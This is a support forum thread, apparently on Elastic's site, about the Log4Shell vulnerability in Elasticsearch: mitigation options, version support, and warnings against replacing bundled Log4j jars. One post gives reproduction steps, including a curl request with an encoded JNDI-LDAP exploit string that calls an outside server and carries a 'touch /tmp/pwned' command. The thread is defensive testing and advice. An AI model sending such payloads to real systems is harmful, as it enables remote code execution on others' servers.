Our advice is exactly as stated in the security announcement:
The simplest remediation is to set the JVM option-Dlog4j2.formatMsgNoLookups=true and restart each node of the cluster.
For Elasticsearch 5.6.11+, 6.4+, and 7.0+, this provides full protection against the RCE and information leak attacks.
Thank you, Mr. TimV.
I had understood the announcement.
Supported versions of Elasticsearch (6.8.9+, 7.8+) used with recent versions of the JDK (JDK9+) are not susceptible to either remote code execution or information leakage. This is due to Elasticsearch’s usage of the Java Security Manager. Most other versions (5.6.11+, 6.4.0+ and 7.0.0+) can be protected via a simple JVM property change.
On the other hand, the announcement also says:
Elasticsearch 6 and 7 are not susceptible to remote code execution with this vulnerability due to our use of the Java Security Manager.
In addition, Mr. DavidTurner said:
It doesn't say that 7.7 is affected, just that it's not a supported version (i.e. it's past EOL ) so it's out of scope.
I don't understand why only unsupported versions need to be addressed for vulnerabilities.
What I would like to know is why there is a difference in the way v7.8 and v7.7 address this vulnerability.
Are there any technical differences between these versions for vulnerabilities?
about Elasticsearch 2 you wrote : Elasticsearch 2 and earlier used a Log4j version that is not vulnerable to the newly discovered flaw. Please note that Elasticsearch 2 is not a supported version, and we always recommend updating to the latest release.
With 7.14.1 and log4j2 2.16.0 jars in place, one option that I tried today is remove x-pack-deprecation and try to see if we ES is able to startup or not.
Found that it does work but not sure whether that is a possible solution to use. @sandeepkanabar any comments on it?
I completely understand from your earlier reply that there might be a good reason for keeping the jar, but this is something we tried out.
@sandeepk-veritas - never a good idea to mix 3rd party applications (ES here) with the latest log4j jar instead of the one they ship with. Let's say I'm using your product but I don't use what you recommend and instead add some other jar to it. You never know what it might break in prod. This is very risky to do in PROD unless you've tested all the scenarios.
Hey @orangejulius, I was able to get ES 5.3.0 to hit a local server emulating LDAP, though haven't gotten to a stage yet where any data is leaked. Nonetheless, it shows that a call to an external server is very possible, at least with the param's I'm using locally (see steps below). It's easy enough to re-create on other version of ES, so hope this is useful for others to test their installations.
Install Elasticsearch 5.3.0 (I'm using the official image via docker pull elasticsearch:5.3.0)
Modify the log4j2.properties to catch more messages (e.g. rootLogger.level = debug)
Hit some endpoint that triggers the logger. In my case, a simple invalid URL with a URL-encoded exploit string was sufficient (note the private-ip field that must be filled with whatever IP the LDAP server is running on) - curl localhost:9200/%24%7Bjndi%3Aldap%3A%2F%2Fprivate-ip-here%3A1389%2FBasic%2FCommand%dG91Y2ggL3RtcC9wd25lZAo%3D%7D
Result: You'll see the LDAP server confirm that it received a network request (Received request from <IP of the ES node>). There are likely other interesting results, I'll update this post if I find any.
Interesting questions/next steps:
In which other versions does this happen?
Is there an API call that gets logged (and thus exploitable) at the default log level of info?
We do not recommend, nor support, directly modifying libraries within the Elasticsearch package. If you want to understand how to protect yourself from this issue, then please read and follow the official advisory.
Apache, Apache Lucene, Apache Hadoop, Hadoop, HDFS and the yellow elephant
logo are trademarks of the
Apache Software Foundation
in the United States and/or other countries.